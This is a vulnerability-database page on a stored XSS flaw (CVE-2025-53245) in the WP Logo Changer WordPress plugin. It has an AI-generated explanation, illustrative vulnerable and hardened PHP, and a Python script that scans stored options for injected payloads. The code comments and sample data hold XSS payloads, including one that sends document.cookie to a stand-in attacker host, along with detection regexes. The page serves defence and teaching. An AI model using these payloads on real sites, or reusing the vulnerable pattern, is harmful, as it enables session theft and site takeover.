VYPR
High severity · 7.1 · NVD Advisory · Published Nov 6, 2025 · Updated Apr 27, 2026

CVE-2025-53245

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Afzal Multani WP Logo Changer am-login-logo allows Stored XSS. This issue affects WP Logo Changer: from n/a through <= 1.2.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Stored XSS in WP Logo Changer plugin <=1.2 allows attackers to inject malicious scripts into WordPress sites.

The WP Logo Changer plugin (am-login-logo), versions up to and including 1.2, suffers from a stored cross-site scripting (XSS) vulnerability caused by improper neutralization of user-supplied input during web page generation [1]. An authenticated attacker with contributor-level privileges or higher can submit arbitrary JavaScript or HTML that is persisted on the server and later executed in the browsers of users who view the affected page.

Exploitation requires user interaction: a privileged user must load a page on which the stored payload is rendered [1]. The payload enters through the plugin's logo upload or settings fields and is written back into page output without sanitization or context-appropriate escaping. The attack surface is therefore the plugin's settings in the WordPress admin area, where the logo configuration is stored, and every page that echoes that configuration.
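The following is an added illustration of the vulnerability class described above, written for this page; it is not the WP Logo Changer source and the option names, form fields, and hook choices (a login-page logo injected via inline CSS on `login_head`) are assumptions. It pairs the unsafe pattern (raw form value stored, raw option echoed) with a hardened version that checks capability and nonce, sanitizes on save with a registered callback, and escapes on output for the CSS `url()` context it lands in.

```php
<?php
// Hypothetical WordPress plugin code illustrating the stored-XSS pattern
// behind CVE-2025-53245. Not the WP Logo Changer source; names are invented.

// --- Vulnerable pattern: raw option in, raw option out ------------------------

// Saves whatever the settings form posted: no capability check, no nonce,
// no sanitization. Any user who can reach the form controls the option.
function vuln_logo_save() {
    if ( isset( $_POST['vuln_logo_url'] ) ) {
        update_option( 'vuln_logo_url', $_POST['vuln_logo_url'] ); // unsanitized
    }
}
add_action( 'admin_init', 'vuln_logo_save' );

// Echoes the stored value into inline CSS on the login page unescaped.
// A stored value such as
//   x); }</style><script>alert(document.domain)</script><style>
// closes the style block and runs in every visitor's browser.
function vuln_logo_print() {
    $url = get_option( 'vuln_logo_url', '' );
    echo '<style>#login h1 a { background-image: url(' . $url . '); }</style>';
}
add_action( 'login_head', 'vuln_logo_print' );

// --- Hardened pattern ---------------------------------------------------------

// Register the option with a sanitize callback so update_option() runs it
// (via the sanitize_option_{$option} filter) before anything is stored.
function safe_logo_register() {
    register_setting(
        'safe_logo_group',
        'safe_logo_url',
        array(
            'type'              => 'string',
            'sanitize_callback' => 'safe_logo_sanitize',
            'default'           => '',
        )
    );
}
add_action( 'admin_init', 'safe_logo_register' );

// Accept only http(s) URLs. esc_url_raw() strips characters outside the URL
// alphabet (including < > " and whitespace) and returns '' for other schemes,
// so javascript: and markup never reach the database.
function safe_logo_sanitize( $value ) {
    return esc_url_raw( trim( (string) $value ), array( 'http', 'https' ) );
}

// Save handler: authorization, then CSRF token, then the registered sanitizer.
function safe_logo_save() {
    if ( ! isset( $_POST['safe_logo_url'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    check_admin_referer( 'safe_logo_save', 'safe_logo_nonce' ); // dies on failure
    update_option( 'safe_logo_url', wp_unslash( $_POST['safe_logo_url'] ) );
}
add_action( 'admin_init', 'safe_logo_save' );

// Output: escape for the context the value lands in, and quote the CSS url()
// argument so a stray ')' in a legitimate URL cannot end the declaration.
function safe_logo_print() {
    $url = get_option( 'safe_logo_url', '' );
    if ( '' === $url ) {
        return;
    }
    printf(
        '<style>#login h1 a { background-image: url("%s"); }</style>',
        esc_url( $url )
    );
}
add_action( 'login_head', 'safe_logo_print' );
```

Sanitizing on save and escaping on output are both needed: the sanitizer bounds what the database can hold, but output escaping is what protects the page if an older, unsanitized value is already stored, or if the value is later reused in a different context (an HTML attribute needs `esc_attr()`, not `esc_url()`).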

A successful attack can redirect visitors to phishing sites, inject advertisements, or steal session cookies [1]. The injected script runs in the victim's browser with that user's privileges; when the victim is an administrator, the script can perform any action the admin session can, which makes privilege escalation and full site takeover possible.

As of the advisory, the vendor has not released a patch, but Patchstack has issued a virtual mitigation rule to block attacks until an official update is available [1]. Users are advised to apply the mitigation rule now and to update as soon as a fixed release is published. Those who cannot do either should consult their hosting provider or a web developer.
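Because no fixed release exists yet, a site owner also wants to know whether a payload is already sitting in the option store. The script below is an added triage helper written for this page, not part of the advisory, Patchstack's rule, or the plugin: it scans rows in the shape produced by `wp option list --format=json` (WP-CLI) and flags values that contain context-breakout characters, inline event handlers or script schemes, or, for `*_url` options, anything that is not a plain http(s) URL. The option names and the sample dump are constructed.

```python
"""Added triage example (not from the advisory or the plugin): scan stored
WordPress option values for payloads indicating a stored XSS of the
CVE-2025-53245 kind has already been exploited. Option names and the input
rows are constructed; point triage_options() at a real WP-CLI JSON dump."""
from __future__ import annotations

import json
import re
from urllib.parse import urlparse

# Sequences a logo URL never needs but a break-out of an attribute, a CSS
# url() or a <style> block does.
BREAKOUT_RE = re.compile(r'[<>"\'`]|\)\s*[;}]|</?\s*(script|style|img|svg)\b', re.I)
# Inline event handlers and script-bearing schemes.
EVENT_OR_SCHEME_RE = re.compile(r'\bon[a-z]+\s*=|javascript:|data:\s*text/html', re.I)
ALLOWED_SCHEMES = {"http", "https"}


def classify_value(name: str, value: str) -> list[str]:
    """Return the reasons a stored value looks injected (empty list = clean)."""
    reasons: list[str] = []
    if BREAKOUT_RE.search(value):
        reasons.append("context-breakout characters")
    if EVENT_OR_SCHEME_RE.search(value):
        reasons.append("event handler or script scheme")
    if name.endswith("_url"):
        parsed = urlparse(value.strip())
        if parsed.scheme.lower() not in ALLOWED_SCHEMES or not parsed.netloc:
            reasons.append("not an http(s) URL")
    return reasons


def triage_options(dump: str, name_prefix: str) -> dict[str, list[str]]:
    """Map each suspicious option (name starting with prefix) to its findings."""
    findings: dict[str, list[str]] = {}
    for row in json.loads(dump):
        name = row["option_name"]
        if not name.startswith(name_prefix):
            continue
        reasons = classify_value(name, str(row["option_value"]))
        if reasons:
            findings[name] = reasons
    return findings


# Constructed sample in `wp option list --format=json` shape (assumed names).
SAMPLE_DUMP = json.dumps([
    {"option_name": "am_logo_url",
     "option_value": "https://example.com/wp-content/uploads/logo.png"},
    {"option_name": "am_logo_link", "option_value": "javascript:alert(1)"},
    {"option_name": "am_logo_alt",
     "option_value": 'x" onerror="alert(document.domain)'},
    {"option_name": "am_logo_title", "option_value": "Welcome"},
    {"option_name": "am_logo_css",
     "option_value": 'x); }</style><script>fetch("//evil.example/?c="+document.cookie)</script><style>'},
    {"option_name": "siteurl", "option_value": "https://example.com"},
])

if __name__ == "__main__":
    print(json.dumps(triage_options(SAMPLE_DUMP, "am_logo_"), indent=2))
```

A hit is a reason to treat the site as compromised rather than merely vulnerable: preserve the row, rotate the credentials of any administrator who may have loaded the affected page, and only then clean the value. The regexes are deliberately broad; review flagged rows by hand instead of tuning them until the sample is quiet.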

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

1

News mentions

0

No linked articles in our index yet.